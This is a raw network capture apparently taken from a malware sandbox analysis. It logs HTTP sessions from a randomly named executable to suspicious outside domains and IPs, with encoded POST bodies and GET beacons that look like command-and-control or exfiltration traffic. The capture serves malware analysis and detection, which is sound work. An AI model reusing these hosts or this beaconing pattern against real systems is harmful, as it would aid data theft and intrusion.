                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                      transfer-encoding: chunked
                                                      content-encoding: br
                                                      vary: Accept-Encoding
                                                      date: Thu, 19 Sep 2024 13:06:23 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                                      Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bd
                                                      Sep 19, 2024 15:06:23.979053974 CEST1236INData Raw: 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87
                                                      Data Ascii: v ?DF:KWEJjf*pZA-fdr_5aAdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S
                                                      Sep 19, 2024 15:06:23.979069948 CEST1236INData Raw: 03 67 54 c8 60 cc c5 34 3d ae f6 21 cb 93 70 31 0d 24 89 84 9c 4e a6 56 a4 3e 92 ed 68 b6 e0 69 6a 5b 66 4e a2 55 78 de b6 0a cf d4 d2 6a 85 5f 41 91 38 20 f4 fa 0d 4e d8 80 c7 1b 9c b0 e9 e0 84 4d b6 bb 9c 6c 6e 2f d4 00 66 f7 23 60 55 4c a5 5c
                                                      Data Ascii: gT`4=!p1$NV>hij[fNUxj_A8 NMln/f#`UL\Dl$V,(q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~
                                                      Sep 19, 2024 15:06:23.979176044 CEST672INData Raw: 25 57 2f b3 9a fc 88 a2 2b 8a 8e 69 a1 28 f2 f4 c1 23 b2 ac 3b 41 86 7a 24 a3 87 96 34 6b a5 5b 8d 83 99 0b 4f 1d 50 3c e4 7c 54 5e 52 74 73 c3 e4 37 b5 20 4b f0 98 a0 7d 08 2c 4e 55 7d 82 16 3c 37 71 31 36 09 a2 22 b5 b0 8e cb 6a f2 9f 63 61 cf
                                                      Data Ascii: %W/+i(#;Az$4k[OP<|T^Rts7 K},NU}<7q16"jcatHVKpwu',pk)MY&|l4"*nEU+E/wQ4[~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/g
                                                      Sep 19, 2024 15:06:23.979192019 CEST1236INData Raw: 62 c6 1b 89 92 7b 27 dc a5 b1 06 73 67 30 8e 0b 31 87 ca 9c 4f 0f 87 55 0c b7 1f 86 17 9c af eb bd d8 82 3c 9e 28 75 87 7d c9 d3 bc 58 a4 f9 66 05 f9 c4 6b 84 7b 46 47 73 5e be e0 7c b5 17 f9 b7 42 be 43 7c 9d e6 ab 30 41 31 6d d8 52 6c d6 af 72
                                                      Data Ascii: b{'sg01OU<(u}Xfk{FGs^|BC|0A1mRlr|DtANjo+{FL5!ky`\E(jV9Emt/29[s+&1n$BPNx*[KbiAvlKlcGhX{Bqoo#(
                                                      Sep 19, 2024 15:06:23.979207993 CEST1236INData Raw: 2e 2d 14 be 36 28 bb db 18 57 16 8a 16 3b ed d4 ed 4c bd 56 dd fa 16 a3 ec 08 f1 39 4c ba cf 32 1b 6d ba 7d bf c4 e5 a1 75 17 43 51 55 54 88 8a 22 01 fe 23 9a 87 f6 82 5a d3 1a a9 10 8a 00 72 fe 23 12 3d 2b e7 e4 a1 c9 be 25 0d 27 bc a0 10 54 08
                                                      Data Ascii: .-6(W;LV9L2m}uCQUT"#Zr#=+%'TNoGSkr=rKRN]kM9+s5E9-h^[WTk jD6#b(6:+FR=9UT XjtYSD$e`33kVS_Bb
                                                      Sep 19, 2024 15:06:23.979223013 CEST1236INData Raw: 2a 71 be 2c de 5c 64 9b 11 f8 39 bc 08 30 e4 34 8e 8f 67 2d a0 ee 16 73 5d de 14 16 5f 27 58 e2 14 ab 3a cb a3 c4 b6 41 ef 82 a4 5f 93 7b 23 24 18 eb 41 84 1b 34 b8 35 01 c2 fb 43 72 c0 20 65 1a c5 f9 8f e4 aa 1f 47 3c 84 e8 82 0f 8e b9 21 89 79
                                                      Data Ascii: *q,\d904g-s]_'X:A_{#$A45Cr eG<!yd?L!.rdO$,rC^GnXDR/@*)f#fY$+VRh"!^<oxJ1srI&mhq q$df"=YC7\"UJw$A4
                                                      Sep 19, 2024 15:06:23.979238987 CEST1236INData Raw: 2b 32 f2 5f b9 72 82 6f e2 a0 73 47 e7 f0 d0 72 ee 49 6d c4 cd 98 f7 59 75 81 0e 11 49 6f be 39 62 2b da 28 b4 1e d2 e3 06 45 93 17 26 bc 5c 3b 4e 87 18 d7 1c fd 30 71 cb dc 9f 3a bc 38 6f ee a1 6d 0a a7 f8 b6 27 74 78 2c 30 80 b4 f3 37 d9 f6 87
                                                      Data Ascii: +2_rosGrImYuIo9b+(E&\;N0q:8om'tx,07OD36?7LP&p&yFqr,>S(tB@YWj,@N5U*SuUS*h7j .tPI4*7%xEsB-|k\h3
                                                      Sep 19, 2024 15:06:23.979254961 CEST1236INData Raw: b0 f4 ab 37 da f0 4a 6a 0b e6 21 ff da c8 f0 f1 dd 9f e4 f5 b3 9b 95 f1 ee fd 2f 46 54 3e 8a e7 4e 39 5b 33 7b b4 df 3b df 18 ce 99 24 36 40 ea 56 85 5e c0 67 e3 9a 37 0e bd 07 0b 22 23 60 78 e5 b5 04 d9 54 64 b0 54 19 d1 50 6b d4 a5 95 4a d1 83
                                                      Data Ascii: 7Jj!/FT>N9[3{;$6@V^g7"#`xTdTPkJw]y^,R[^N9H7lA680*n`wcg!;nf9emXAvF3x3in`Mdm.dO0X?dCa|/5X_;4BUHuKq8!T
                                                      Sep 19, 2024 15:06:23.979269981 CEST552INData Raw: 39 db a8 15 cb e9 8a cd 69 4e 73 ba 62 39 ac 58 41 d7 bf 4f 41 73 c8 e1 02 e6 74 c5 96 b0 62 6b 98 de 67 49 57 6c 05 8f f1 0a 72 9a ff 4b 76 77 99 15 e1 b8 f7 7b 8d 9d b4 a0 07 15 00 2e 82 f1 3b 24 64 34 1d bf 49 e7 db 92 60 bf d0 92 0e 05 4d 21
                                                      Data Ascii: 9iNsb9XAOAstbkgIWlrKvw{.;$d4I`M!I2FOF+G7=IQv`,jj4D'(9A!e`#x6N^tVOo-JCEUV+wiQPT[#G5VN5]EwPW=YVV0G#Xrp
                                                      Sep 19, 2024 15:06:23.981684923 CEST940INData Raw: c0 64 2b 9e d6 ed 2d e8 4c f7 1b 9b 3d 34 2c 63 e8 26 8a 6d 91 d6 60 aa e6 39 ff ae 91 c5 aa 98 81 e1 17 91 36 14 79 6e e5 a9 f5 1a 5a 32 5c 5a 5c 2c f6 c9 df 94 66 18 07 34 03 d1 39 a2 10 f4 69 73 f4 24 94 36 9e 71 11 19 26 15 bf 39 1e 97 69 19
                                                      Data Ascii: d+-L=4,c&m`96ynZ2\Z\,f49is$6q&9i_y/bgi]h/8G''qPjO@88'Q1)nC+5BZ)w}Gz`Kl!U&<*p!zLU-n956@F&2^^=t


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.2249189103.21.221.4802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:25.282819986 CEST2472OUTPOST /lybf/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.tempatmudisini01.click
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 3625
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.tempatmudisini01.click
                                                      Referer: http://www.tempatmudisini01.click/lybf/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 56 31 51 55 46 6c 66 35 51 4b 35 71 49 78 64 35 72 4c 41 31 76 55 31 4e 68 4a 56 72 2f 58 59 6e 6b 44 36 32 53 76 6c 46 6c 69 70 56 65 74 39 74 57 6c 68 70 73 42 61 70 59 39 36 38 64 46 46 4b 50 4b 35 4d 4f 78 79 70 70 65 57 6e 4b 65 70 6f 41 2b 64 71 42 4f 4b 57 52 78 2b 59 4b 4e 32 63 47 4e 41 48 71 4c 6c 4a 42 6c 49 41 6f 73 54 71 6d 46 5a 44 67 36 72 6a 35 79 6e 58 41 6f 2b 37 35 7a 75 6d 44 50 4c 50 62 30 43 79 37 77 42 62 68 43 73 77 4e 30 78 6a 71 6e 42 30 59 61 35 2f 45 73 68 37 41 6b 53 57 62 78 74 49 32 43 47 2b 35 32 48 4f 45 6d 54 33 47 69 6c 71 42 57 4d 79 44 4d 71 6a 2f 2f 62 64 4d 70 79 4b 45 44 64 72 4c 76 37 38 51 52 33 73 4c 6d 2f 77 4c 49 41 70 71 34 7a 59 30 47 65 39 37 76 66 44 32 48 62 42 32 43 2f 30 63 32 57 79 78 38 73 36 79 32 4e 74 36 39 31 78 49 56 7a 5a 56 2b 2b 34 48 74 56 58 55 77 62 72 50 56 55 4b 2f 45 67 31 4c 43 45 53 4d 4b 64 63 78 63 4c 44 58 74 31 52 70 4d 45 50 32 6f 75 50 75 78 49 2b 36 58 68 2b 63 75 51 48 6b 56 4d 71 43 46 72 5a 30 30 35 5a 77 [TRUNCATED]
                                                      Data Ascii: 00yp=V1QUFlf5QK5qIxd5rLA1vU1NhJVr/XYnkD62SvlFlipVet9tWlhpsBapY968dFFKPK5MOxyppeWnKepoA+dqBOKWRx+YKN2cGNAHqLlJBlIAosTqmFZDg6rj5ynXAo+75zumDPLPb0Cy7wBbhCswN0xjqnB0Ya5/Esh7AkSWbxtI2CG+52HOEmT3GilqBWMyDMqj//bdMpyKEDdrLv78QR3sLm/wLIApq4zY0Ge97vfD2HbB2C/0c2Wyx8s6y2Nt691xIVzZV++4HtVXUwbrPVUK/Eg1LCESMKdcxcLDXt1RpMEP2ouPuxI+6Xh+cuQHkVMqCFrZ005Zw3HzomrxV3m+sJgqsY+vxSPZxNhlljHPm5cpzXoBJWV01KVOqO6dVgu8t/ct9nMaAkYJpqN63acNY0KSnmmI68sPeLDiRFXqAjVn2E0U5fbxQPLVb3QlEBcT0rFuSied3EZ33WplvRQ1IGt2P7Lvzx1EsunsVZghPXc141vxgVqms948MljCLdndG1c21Cvt7TnUP2ITF5JnWeGikaglEdJWl/Ce5mZEGPBrZTsg8M0bYegwon0VycNeLWET1Ip3Xoxoo1mmiax/5RH/XKac0qcTp6/ZZbZSUqLW2B19mejQBs2dUb7V3hia1zjaOjCPiN4lAkGuw8ZPu4nvt58pGZW2QsnV1BKhPfxZBdLIsbMFBn2Qr77eHRfKrSq5aw3XmMxRzsSM36lES1Zb+LpBNi85/pp3MHiWKdKBc661Lp+IKP910JiPIZVaJB9tA5egvw4NPw23aJ6fQQU5RaCY4mOGH5IfqyAeWjxPV4Z2pGSuu43b035xVwGb2EHo5fXFp/0zDpgToYMXDXI/kW5qTzeCRsqKGmWObyjXAPi0U+KkXvd8H9iCoYuuQKE7BiLp/avO2n+psE1y4gDg5Z4/eLtP9r71FtPbklWZJkoyIl4HRgWQ1av9CmmtMYfTnlOYNht3qS8yNOyVe9TQ1iE9DW7QPY1+hnNZ5kO [TRUNCATED]
                                                      Sep 19, 2024 15:06:25.287997007 CEST1722OUTData Raw: 53 72 6a 30 46 54 6b 65 4e 33 66 36 48 57 74 35 38 37 35 7a 66 46 55 7a 32 74 68 4d 41 4e 79 31 31 32 76 4c 5a 69 65 36 63 7a 74 6f 58 55 6a 31 4f 62 55 6a 6e 66 45 38 30 73 4c 4b 48 70 43 66 6e 44 41 2f 73 53 63 48 43 63 43 37 39 34 45 73 52 43
                                                      Data Ascii: Srj0FTkeN3f6HWt5875zfFUz2thMANy112vLZie6cztoXUj1ObUjnfE80sLKHpCfnDA/sScHCcC794EsRCdk4Q1hb74GhCN7htsjlOsbOOwZxEtmkhTn3bcMKHrAdnVps2GX6//Qa65ei4Wgrkjic3BRnod4x3oAniTC8SKKnUsYav8uNRZKkmDTFOcMnHdmhY0kutn7dXi+MF9YHYln0SorstVVUbEoLz9s5No4kuLsXp4G4ow
                                                      Sep 19, 2024 15:06:26.567323923 CEST1236INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      x-powered-by: PHP/7.4.33
                                                      x-litespeed-tag: 894_HTTP.404
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      content-type: text/html; charset=UTF-8
                                                      link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                      x-litespeed-cache-control: no-cache
                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                      transfer-encoding: chunked
                                                      content-encoding: br
                                                      vary: Accept-Encoding
                                                      date: Thu, 19 Sep 2024 13:06:26 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                                      Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bd
                                                      Sep 19, 2024 15:06:26.567344904 CEST224INData Raw: 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87
                                                      Data Ascii: v ?DF:KWEJjf*pZA-fdr_5aAdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCn
                                                      Sep 19, 2024 15:06:26.567359924 CEST1236INData Raw: 70 b1 68 5a f8 6c dc 33 ba df 95 d9 0b f5 be 36 16 a7 53 8f aa 05 a9 7d 10 ba 06 db ef f7 1a 07 78 dd b6 97 78 21 f8 59 76 4f 55 3c e7 3c cd 97 3c 29 a5 ce 91 20 c2 3d 37 49 52 51 39 76 dc c8 3f ab 3a e0 39 c4 a4 68 48 3a 0e 52 a9 77 28 9a df 1c
                                                      Data Ascii: phZl36S}xx!YvOU<<<) =7IRQ9v?:9hH:Rw(:KyIjXcI*Xkts?:)IkRB5WQ?d4_H15IB5cJ6L(IyWW`dG"\Y8Iil*2_'d*3S<HQCy9
                                                      Sep 19, 2024 15:06:26.567372084 CEST1236INData Raw: 17 54 62 32 80 3b b2 77 3a 55 0d 05 51 55 51 dc aa 61 7e ab 8a f9 ad 1a 16 b7 aa 58 dc aa 61 79 ab 8a e5 ad 1a 56 b7 2a 58 dd 9e 9e d1 99 20 02 96 f9 86 37 78 b8 46 d1 64 32 99 b4 d3 0b 0b 1f d0 49 ff 5c 1e b9 47 30 c2 a4 26 75 6d 1b cc 66 db b9
                                                      Data Ascii: Tb2;w:UQUQa~XayV*X 7xFd2I\G0&umf9[:BG*5KZ&_hvQ%ZIKxvvViV-j>zY`-[VSj<i&Y1^OE~kpo.zK^O9+yEKm
                                                      Sep 19, 2024 15:06:26.567394972 CEST1236INData Raw: fd 0b 48 ed d1 05 74 3a 3c 60 b1 85 1d f6 e9 69 2f ea 67 85 56 69 30 85 42 9f 85 ef 57 e7 9c 33 83 e2 ef c6 c8 48 79 a2 4e a2 0b ab cc 3d b3 93 87 22 bf 5d 13 db 84 24 5d e8 e1 f2 78 3b 36 2f 81 b3 c2 06 c4 69 b0 29 38 0c 31 01 10 17 74 2f 6a 14
                                                      Data Ascii: Ht:<`i/gVi0BW3HyN="]$]x;6/i)81t/j y$]c-E(fNdA%>Td!iabOxEA5P7lQ|PzM>j4^*LvXO-fM(W&T<
                                                      Sep 19, 2024 15:06:26.567406893 CEST672INData Raw: b2 50 32 9a f6 b4 b6 b6 e9 7f 7b 12 af 94 3d ad 18 a0 24 b1 4f 5c e0 e3 89 5d 15 f6 21 96 f8 78 c0 38 0a 47 08 cc f7 81 03 d8 4d 82 fb 08 b9 d4 3d ad 77 bf dc e3 70 78 9f b8 df be 27 8e 90 a2 a7 69 f5 38 0f ff bc 3e 43 ed 2f 3f bb ad eb b6 f7 fb
                                                      Data Ascii: P2{=$O\]!x8GM=wpx'i8>C/?^}l,sKNbr~{#c1Bx|=`XC9.dwrj(4c^!b A)j.`ra4OQXh>I%t*J9
                                                      Sep 19, 2024 15:06:26.567428112 CEST1236INData Raw: 65 60 33 1a 33 6b 56 53 13 a8 5f f7 9c a2 42 d5 b4 62 e1 8c 76 3a b6 d1 b4 e5 58 6c 40 32 86 16 dc 50 21 4d 0a 8e 06 41 51 73 2a 14 8f 11 34 c1 15 71 c7 19 db 87 2b 2a b8 a6 68 f4 28 42 2b aa 34 55 9a 98 9b 20 bb f6 1e 5e 51 4e 8d 28 32 1b ea 8f
                                                      Data Ascii: e`33kVS_Bbv:Xl@2P!MAQs*4q+*h(B+4U ^QN(2-_!)_)6"#e4k*xphV$uF?2*>FXNyG"m[3\HM%ABsQIQ4q9)B_iO/IA(n~A^]Y|l^]6(?B}
                                                      Sep 19, 2024 15:06:26.567439079 CEST1236INData Raw: 81 22 ba e1 b7 e8 03 55 4a 77 cc 90 eb b6 24 f2 41 34 1b c3 e9 ae 15 c0 76 d3 62 9f 20 e9 7e 75 8e 00 d6 b6 07 0a c4 1a 4c b2 65 63 03 9e 18 7e 0e 36 6e 97 17 0a 3e be 3b 2f f4 01 9c 8a 2f 1a 72 f4 5f 3a e4 e8 37 60 c8 d1 23 34 38 2b d1 0c 92 dd
                                                      Data Ascii: "UJw$A4vb ~uLec~6n>;//r_:7`#48+1*nI{Fx :8]W*vh#_a$O~!z`uW{0iF"Uq5'Hd%.q\=@)DzaiCEzvL!VjsD0J0jThG1'tv>Gt
                                                      Sep 19, 2024 15:06:26.567451000 CEST1236INData Raw: 8a 78 1a e6 45 73 42 2d f2 7c 0b 6b b1 5c b6 68 93 bf 33 73 f5 a3 8f ff db 31 40 17 13 32 84 91 e8 b6 1d 0e 68 29 92 6b f8 8d dd ba 79 87 e3 0f 0f cd d6 c7 f0 3d 33 3c 5b 69 b2 27 7a 6f 84 aa 2a 4d a0 d3 d5 65 69 20 f0 6d 27 79 1d ba 07 76 c2 dd
                                                      Data Ascii: xEsB-|k\h3s1@2h)ky=3<[i'zo*Mei m'yvT\/7+5r;,[dju`!4Q;3q<RJ*Z`o^).AqI4LPu59Z"m)V]U7\XDv4md)ZzFWmb46
                                                      Sep 19, 2024 15:06:26.567462921 CEST1236INData Raw: 34 bd 42 c2 55 48 89 75 4b ae d6 71 92 38 f8 0e 1c 21 54 a3 5b a9 44 97 1a 82 d5 4e bf 7a 8a 4e 74 87 2e d9 e1 f0 67 d7 ac 43 65 44 63 92 bf af 58 e0 c2 2c 16 65 3d 8c 08 9e 12 95 98 9d 2a ff cb 6a 8d 0e 9e 2a 53 0b 35 db 45 3f 34 e9 f7 ac f1 10
                                                      Data Ascii: 4BUHuKq8!T[DNzNt.gCeDcX,e=*j*S5E?4$F9:n9RCL6wu;%b.a@.5|;d(gpRftxJt8LZ::I(2v'khO34f=v=4/gY


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.2249190103.21.221.4802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:27.849251986 CEST483OUTGET /lybf/?8Xv=VLHph&00yp=Y340GT3aYbxxYgEUood/mUhipI1uyVEinTnWDrZvpldzXPMOdnATqmDbf8qtGi1QFPteNGCJ0+TZKIVMINx1OZKHCzmWNMOqHssTi6IKHS9b8ff9oSREka3//nyh HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.tempatmudisini01.click
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Sep 19, 2024 15:06:29.004389048 CEST525INHTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      x-powered-by: PHP/7.4.33
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                      content-type: text/html; charset=UTF-8
                                                      x-redirect-by: WordPress
                                                      location: http://tempatmudisini01.click/lybf/?8Xv=VLHph&00yp=Y340GT3aYbxxYgEUood/mUhipI1uyVEinTnWDrZvpldzXPMOdnATqmDbf8qtGi1QFPteNGCJ0+TZKIVMINx1OZKHCzmWNMOqHssTi6IKHS9b8ff9oSREka3//nyh
                                                      x-litespeed-cache: miss
                                                      content-length: 0
                                                      date: Thu, 19 Sep 2024 13:06:28 GMT
                                                      server: LiteSpeed


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.224919184.32.84.32802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:34.168216944 CEST2472OUTPOST /eaxv/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.glintra.cyou
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 2161
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.glintra.cyou
                                                      Referer: http://www.glintra.cyou/eaxv/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 57 46 64 34 46 4a 76 4a 70 4c 78 37 4f 45 39 6e 2f 70 62 4e 73 46 57 55 74 52 59 6d 61 6d 36 74 79 74 5a 34 39 73 4d 76 46 44 64 54 57 44 6c 30 4f 6e 79 6e 7a 51 4a 76 4a 65 35 38 4a 45 72 7a 69 76 78 38 68 51 76 47 2b 6a 56 64 46 55 68 35 6b 6f 34 63 2f 79 6e 4c 4f 41 39 67 71 76 50 52 78 30 65 37 6d 65 73 67 4c 47 6b 6a 72 78 71 6d 71 5a 46 42 50 57 69 46 42 61 74 49 4e 47 50 6a 76 45 53 79 56 6b 45 75 70 41 7a 5a 71 4f 36 75 73 6f 6b 69 31 33 35 76 35 48 4b 4d 33 65 38 52 69 56 7a 30 55 6d 66 41 6b 62 61 38 78 32 76 34 4e 72 39 39 4e 4a 7a 35 5a 44 78 6b 4c 4b 6d 66 6c 77 34 55 42 79 39 2f 74 6e 47 6a 6d 69 39 4e 33 53 58 58 30 53 61 55 36 73 64 55 66 37 51 73 46 39 43 46 5a 35 62 32 56 78 43 77 4f 36 59 65 72 61 39 77 61 78 32 66 2f 39 35 78 45 6e 61 52 6a 77 67 42 48 53 69 46 64 45 42 64 71 61 4b 2f 32 45 41 55 68 37 47 48 56 71 77 45 74 43 66 41 2b 32 79 35 70 44 35 77 67 30 55 50 30 71 30 6c 42 75 56 79 4c 4c 54 50 71 73 73 7a 52 42 55 2f 46 2b 4b 46 54 58 32 31 61 36 55 67 71 [TRUNCATED]
                                                      Data Ascii: 00yp=WFd4FJvJpLx7OE9n/pbNsFWUtRYmam6tytZ49sMvFDdTWDl0OnynzQJvJe58JErzivx8hQvG+jVdFUh5ko4c/ynLOA9gqvPRx0e7mesgLGkjrxqmqZFBPWiFBatINGPjvESyVkEupAzZqO6usoki135v5HKM3e8RiVz0UmfAkba8x2v4Nr99NJz5ZDxkLKmflw4UBy9/tnGjmi9N3SXX0SaU6sdUf7QsF9CFZ5b2VxCwO6Yera9wax2f/95xEnaRjwgBHSiFdEBdqaK/2EAUh7GHVqwEtCfA+2y5pD5wg0UP0q0lBuVyLLTPqsszRBU/F+KFTX21a6Ugqnz6sE7NucABCPt8lkmkxtZ8Jac/pzBUmU2HgoWSuMBgNgCY2gxCsCQqhTmAS0hWhZ6Xsp1EuemYDrd4dEVE/NBui/8mg/zCm7ODPIOoroPeZOaAryVM4B9NDSkeCFwIDORAmifxuh1ZZOB4UpGXQ1GjQGjHTSLHvG1ZmxwVXTbBwjxdcgnyeUxPxu0gK87zSt8Yb54yncZ21VRvJxBdx4El9zUCp2zf0mjbYHLa+wSRo0hhhg+4LgdmrEHTn2SJHE4F4jcFEoys6zkWUDeeHFrjGeUjRa6a1y0b2tV9TlftoyCxapk8kR0evaT7BxzdwKRGnQXcffNLNlUJTZz24cI2OP3Wu5Qjt1/nY9aPb0kT0CnK9vcU40F/W9F8ErbFWmcaA7HoKxrxdLRKSTuydsLoFjUUXoyDhIB+qRhDZEwSi3nMw6weGYb8TpSImf9uRMBRYh0rGuze8Z2agCwTiUeCpDxyy4eeil5AYSHJSsXGVKaghxkJBTn6zwJ6eNL3LZlDBD2aLalSL9mrzZynkGVcayQdRiYeX0iZBTha32eOhTJW0BA1IHd